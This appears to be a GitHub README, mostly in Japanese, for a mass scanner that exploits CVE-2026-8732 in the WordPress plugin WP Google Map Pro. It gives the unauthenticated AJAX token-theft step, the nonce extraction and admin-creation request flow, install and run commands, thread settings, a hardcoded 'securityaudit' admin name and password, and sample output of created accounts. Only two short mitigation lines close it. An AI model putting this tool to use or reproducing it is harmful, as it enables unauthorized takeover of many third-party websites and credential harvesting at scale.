
Multi-threaded mass scanner for CVE-2026-8732 in WordPress WP Google Map Pro. Automates nonce extraction, token exploitation, and hidden admin account creation on vulnerable sites.
このツールは、WordPress用プラグイン WP Google Map Pro の脆弱性 CVE-2026-8732 を悪用します。この脆弱性により、認証されていない攻撃者がAJAXエンドポイント (admin-ajax.php?action=wpgmp_temp_access_ajax) を介して有効な wpmp_token を取得できます。このトークンを使用して、攻撃者はWordPress管理パネルにアクセスし、新しい管理者ユーザーを作成できます。
このツールは、ドメインリストから マススキャン を実行し、nonceとトークンを抽出し、脆弱なサイトに隠し管理者アカウントを自動的に作成します。結果は完全なトークン詳細とともにリアルタイムで保存されます。
| フィールド | 値 |
|---|---|
| CVE ID | CVE-2026-8732(このプラグインの仮設) |
| 影響を受けるプラグイン | WP Google Map Pro (バージョン <= 1.5.0) |
| 脆弱性タイプ | アクセス制御の破綻 / 権限昇格 |
| 攻撃ベクトル | 認証不要、リモート |
| 影響 | 管理者アカウント作成によるサイト完全乗っ取り |
admin_created.txt に保存http:// と https:// の両方をサポートrequests ライブラリ必要なライブラリをインストールします:
pip install requests
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
ターゲットリストファイルを準備します(1行に1ドメイン):
example.com
https://target-website.com
http://vulnerable-site.org
スキャナーを実行します:
python2 exploit.py targets.txt
| ファイル | 内容 |
|---|---|
| res.txt | 脆弱なドメインと完全なトークン、リダイレクトURL(あれば) |
| admin_created.txt | 作成成功した管理者の認証情報(ドメイン、ユーザー名、パスワード、メール) |
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
スクリプト内の以下の変数を編集します:
TIMEOUT = 10 # リクエストタイムアウト(秒)
JUMLAH_THREAD = 10 # 同時スレッド数
OUTPUT_FILE = "res.txt" # 脆弱性結果の出力ファイル
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
wpgmp_local または fc-call-nonce を抽出します。/wp-admin/admin-ajax.php に action=wpgmp_temp_access_ajax と取得したnonceをPOST送信します。/wp-admin/user-new.php にアクセスし、_wpnonce_create-user を抽出して、新しい管理者ユーザーを作成するPOSTを送信します。users.php へのHTTP 302リダイレクトをチェックするか、ユーザー一覧で新しいユーザー名を検索して成功を確認します。wpgmp_temp_access_ajax を無効化する。admin-ajax.php への悪意のあるリクエストをブロックする。